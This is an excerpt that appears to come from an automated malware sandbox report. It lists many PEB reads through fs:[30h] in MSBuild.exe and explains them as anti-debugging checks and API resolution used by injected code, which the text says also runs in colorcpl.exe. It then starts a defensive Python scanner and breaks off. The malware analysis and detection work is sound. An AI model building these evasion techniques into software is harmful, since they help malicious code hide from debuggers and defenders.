Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141513A mov eax, dword ptr fs:[00000030h] 7_2_0141513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014741E8 mov eax, dword ptr fs:[00000030h] 7_2_014741E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140C182 mov eax, dword ptr fs:[00000030h] 7_2_0140C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141A185 mov eax, dword ptr fs:[00000030h] 7_2_0141A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01412990 mov eax, dword ptr fs:[00000030h] 7_2_01412990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EB1E1 mov eax, dword ptr fs:[00000030h] 7_2_013EB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014669A6 mov eax, dword ptr fs:[00000030h] 7_2_014669A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014161A0 mov eax, dword ptr fs:[00000030h] 7_2_014161A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014651BE mov eax, dword ptr fs:[00000030h] 7_2_014651BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01400050 mov eax, dword ptr fs:[00000030h] 7_2_01400050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013FB02A mov eax, dword ptr fs:[00000030h] 7_2_013FB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A2073 mov eax, dword ptr fs:[00000030h] 7_2_014A2073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B1074 mov eax, dword ptr fs:[00000030h] 7_2_014B1074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01467016 mov eax, dword ptr fs:[00000030h] 7_2_01467016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B4015 mov eax, dword ptr fs:[00000030h] 7_2_014B4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141002D mov eax, dword ptr fs:[00000030h] 7_2_0141002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0147B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0147B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0147B8D0 mov ecx, dword ptr fs:[00000030h] 7_2_0147B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E9080 mov eax, dword ptr fs:[00000030h] 7_2_013E9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01463884 mov eax, dword ptr fs:[00000030h] 7_2_01463884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014290AF mov eax, dword ptr fs:[00000030h] 7_2_014290AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141F0BF mov ecx, dword ptr fs:[00000030h] 7_2_0141F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141F0BF mov eax, dword ptr fs:[00000030h] 7_2_0141F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B8B58 mov eax, dword ptr fs:[00000030h] 7_2_014B8B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01413B7A mov eax, dword ptr fs:[00000030h] 7_2_01413B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A131B mov eax, dword ptr fs:[00000030h] 7_2_014A131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EDB60 mov ecx, dword ptr fs:[00000030h] 7_2_013EDB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EF358 mov eax, dword ptr fs:[00000030h] 7_2_013EF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EDB40 mov eax, dword ptr fs:[00000030h] 7_2_013EDB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014653CA mov eax, dword ptr fs:[00000030h] 7_2_014653CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014103E2 mov eax, dword ptr fs:[00000030h] 7_2_014103E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F1B8F mov eax, dword ptr fs:[00000030h] 7_2_013F1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A138A mov eax, dword ptr fs:[00000030h] 7_2_014A138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0149D380 mov ecx, dword ptr fs:[00000030h] 7_2_0149D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141B390 mov eax, dword ptr fs:[00000030h] 7_2_0141B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01412397 mov eax, dword ptr fs:[00000030h] 7_2_01412397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B5BA5 mov eax, dword ptr fs:[00000030h] 7_2_014B5BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01474257 mov eax, dword ptr fs:[00000030h] 7_2_01474257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EAA16 mov eax, dword ptr fs:[00000030h] 7_2_013EAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0149B260 mov eax, dword ptr fs:[00000030h] 7_2_0149B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B8A62 mov eax, dword ptr fs:[00000030h] 7_2_014B8A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F8A0A mov eax, dword ptr fs:[00000030h] 7_2_013F8A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0142927A mov eax, dword ptr fs:[00000030h] 7_2_0142927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01403A1C mov eax, dword ptr fs:[00000030h] 7_2_01403A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E9240 mov eax, dword ptr fs:[00000030h] 7_2_013E9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01412ACB mov eax, dword ptr fs:[00000030h] 7_2_01412ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013FAAB0 mov eax, dword ptr fs:[00000030h] 7_2_013FAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E52A5 mov eax, dword ptr fs:[00000030h] 7_2_013E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01412AE4 mov eax, dword ptr fs:[00000030h] 7_2_01412AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141D294 mov eax, dword ptr fs:[00000030h] 7_2_0141D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141FAB0 mov eax, dword ptr fs:[00000030h] 7_2_0141FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01423D43 mov eax, dword ptr fs:[00000030h] 7_2_01423D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01463540 mov eax, dword ptr fs:[00000030h] 7_2_01463540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F3D34 mov eax, dword ptr fs:[00000030h] 7_2_013F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EAD30 mov eax, dword ptr fs:[00000030h] 7_2_013EAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01407D50 mov eax, dword ptr fs:[00000030h] 7_2_01407D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140C577 mov eax, dword ptr fs:[00000030h] 7_2_0140C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140C577 mov eax, dword ptr fs:[00000030h] 7_2_0140C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0146A537 mov eax, dword ptr fs:[00000030h] 7_2_0146A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01414D3B mov eax, dword ptr fs:[00000030h] 7_2_01414D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01414D3B mov eax, dword ptr fs:[00000030h] 7_2_01414D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01414D3B mov eax, dword ptr fs:[00000030h] 7_2_01414D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B8D34 mov eax, dword ptr fs:[00000030h] 7_2_014B8D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E2D8A mov eax, dword ptr fs:[00000030h] 7_2_013E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E2D8A mov eax, dword ptr fs:[00000030h] 7_2_013E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E2D8A mov eax, dword ptr fs:[00000030h] 7_2_013E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E2D8A mov eax, dword ptr fs:[00000030h] 7_2_013E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E2D8A mov eax, dword ptr fs:[00000030h] 7_2_013E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01498DF1 mov eax, dword ptr fs:[00000030h] 7_2_01498DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01412581 mov eax, dword ptr fs:[00000030h] 7_2_01412581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01412581 mov eax, dword ptr fs:[00000030h] 7_2_01412581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01412581 mov eax, dword ptr fs:[00000030h] 7_2_01412581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01412581 mov eax, dword ptr fs:[00000030h] 7_2_01412581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141FD9B mov eax, dword ptr fs:[00000030h] 7_2_0141FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141FD9B mov eax, dword ptr fs:[00000030h] 7_2_0141FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013FD5E0 mov eax, dword ptr fs:[00000030h] 7_2_013FD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013FD5E0 mov eax, dword ptr fs:[00000030h] 7_2_013FD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014135A1 mov eax, dword ptr fs:[00000030h] 7_2_014135A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01411DB5 mov eax, dword ptr fs:[00000030h] 7_2_01411DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01411DB5 mov eax, dword ptr fs:[00000030h] 7_2_01411DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01411DB5 mov eax, dword ptr fs:[00000030h] 7_2_01411DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141A44B mov eax, dword ptr fs:[00000030h] 7_2_0141A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0147C450 mov eax, dword ptr fs:[00000030h] 7_2_0147C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0147C450 mov eax, dword ptr fs:[00000030h] 7_2_0147C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140746D mov eax, dword ptr fs:[00000030h] 7_2_0140746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B740D mov eax, dword ptr fs:[00000030h] 7_2_014B740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B740D mov eax, dword ptr fs:[00000030h] 7_2_014B740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B740D mov eax, dword ptr fs:[00000030h] 7_2_014B740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1C06 mov eax, dword ptr fs:[00000030h] 7_2_014A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01466C0A mov eax, dword ptr fs:[00000030h] 7_2_01466C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01466C0A mov eax, dword ptr fs:[00000030h] 7_2_01466C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01466C0A mov eax, dword ptr fs:[00000030h] 7_2_01466C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01466C0A mov eax, dword ptr fs:[00000030h] 7_2_01466C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141BC2C mov eax, dword ptr fs:[00000030h] 7_2_0141BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B8CD6 mov eax, dword ptr fs:[00000030h] 7_2_014B8CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F849B mov eax, dword ptr fs:[00000030h] 7_2_013F849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A14FB mov eax, dword ptr fs:[00000030h] 7_2_014A14FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01466CF0 mov eax, dword ptr fs:[00000030h] 7_2_01466CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01466CF0 mov eax, dword ptr fs:[00000030h] 7_2_01466CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01466CF0 mov eax, dword ptr fs:[00000030h] 7_2_01466CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E4F2E mov eax, dword ptr fs:[00000030h] 7_2_013E4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E4F2E mov eax, dword ptr fs:[00000030h] 7_2_013E4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B8F6A mov eax, dword ptr fs:[00000030h] 7_2_014B8F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B070D mov eax, dword ptr fs:[00000030h] 7_2_014B070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B070D mov eax, dword ptr fs:[00000030h] 7_2_014B070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141A70E mov eax, dword ptr fs:[00000030h] 7_2_0141A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141A70E mov eax, dword ptr fs:[00000030h] 7_2_0141A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140F716 mov eax, dword ptr fs:[00000030h] 7_2_0140F716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0147FF10 mov eax, dword ptr fs:[00000030h] 7_2_0147FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0147FF10 mov eax, dword ptr fs:[00000030h] 7_2_0147FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013FFF60 mov eax, dword ptr fs:[00000030h] 7_2_013FFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141E730 mov eax, dword ptr fs:[00000030h] 7_2_0141E730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013FEF40 mov eax, dword ptr fs:[00000030h] 7_2_013FEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F8794 mov eax, dword ptr fs:[00000030h] 7_2_013F8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014237F5 mov eax, dword ptr fs:[00000030h] 7_2_014237F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01467794 mov eax, dword ptr fs:[00000030h] 7_2_01467794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01467794 mov eax, dword ptr fs:[00000030h] 7_2_01467794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01467794 mov eax, dword ptr fs:[00000030h] 7_2_01467794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EE620 mov eax, dword ptr fs:[00000030h] 7_2_013EE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140AE73 mov eax, dword ptr fs:[00000030h] 7_2_0140AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140AE73 mov eax, dword ptr fs:[00000030h] 7_2_0140AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140AE73 mov eax, dword ptr fs:[00000030h] 7_2_0140AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140AE73 mov eax, dword ptr fs:[00000030h] 7_2_0140AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140AE73 mov eax, dword ptr fs:[00000030h] 7_2_0140AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EC600 mov eax, dword ptr fs:[00000030h] 7_2_013EC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EC600 mov eax, dword ptr fs:[00000030h] 7_2_013EC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EC600 mov eax, dword ptr fs:[00000030h] 7_2_013EC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01418E00 mov eax, dword ptr fs:[00000030h] 7_2_01418E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F766D mov eax, dword ptr fs:[00000030h] 7_2_013F766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141A61C mov eax, dword ptr fs:[00000030h] 7_2_0141A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141A61C mov eax, dword ptr fs:[00000030h] 7_2_0141A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0149FE3F mov eax, dword ptr fs:[00000030h] 7_2_0149FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F7E41 mov eax, dword ptr fs:[00000030h] 7_2_013F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F7E41 mov eax, dword ptr fs:[00000030h] 7_2_013F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F7E41 mov eax, dword ptr fs:[00000030h] 7_2_013F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F7E41 mov eax, dword ptr fs:[00000030h] 7_2_013F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F7E41 mov eax, dword ptr fs:[00000030h] 7_2_013F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F7E41 mov eax, dword ptr fs:[00000030h] 7_2_013F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01428EC7 mov eax, dword ptr fs:[00000030h] 7_2_01428EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0149FEC0 mov eax, dword ptr fs:[00000030h] 7_2_0149FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014136CC mov eax, dword ptr fs:[00000030h] 7_2_014136CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B8ED6 mov eax, dword ptr fs:[00000030h] 7_2_014B8ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014116E0 mov ecx, dword ptr fs:[00000030h] 7_2_014116E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0147FE87 mov eax, dword ptr fs:[00000030h] 7_2_0147FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F76E2 mov eax, dword ptr fs:[00000030h] 7_2_013F76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014646A7 mov eax, dword ptr fs:[00000030h] 7_2_014646A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B0EA5 mov eax, dword ptr fs:[00000030h] 7_2_014B0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B0EA5 mov eax, dword ptr fs:[00000030h] 7_2_014B0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B0EA5 mov eax, dword ptr fs:[00000030h] 7_2_014B0EA5
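Every hit above is a 32-bit read of fs:[30h], the TEB field that holds the PEB pointer in a WOW64 process; the same pattern recurs for the injected code in colorcpl.exe in this report. Code reads the PEB for two reasons that match the report's other signatures: debugger checks (PEB.BeingDebugged at +0x02, PEB.NtGlobalFlag at +0x68) and resolving APIs without an import table by walking PEB.Ldr (+0x0C). The scanner below is an added example, not Joe Sandbox code and not the sample's code: it finds the x86 encodings of `mov r32, dword ptr fs:[30h]` (both the `64 A1` short form for eax and the `64 8B /r` form the `mov ecx, ...` hits use) plus the two-step TEB route `mov r32, fs:[18h]` / `mov r32, [r32+30h]` in a raw code buffer, then reports which PEB field is touched next. The byte sequence `SAMPLE` and the field table are constructed for the example; the follow-on field lookup is a heuristic on the next few bytes, not a disassembler.

```python
"""Find x86 (32-bit) PEB reads via the FS segment in a raw code buffer.

Added example for this report; not Joe Sandbox code and not bytes from the
analyzed sample. SAMPLE below is constructed to mirror the report's hits.
"""
import re

REGS32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

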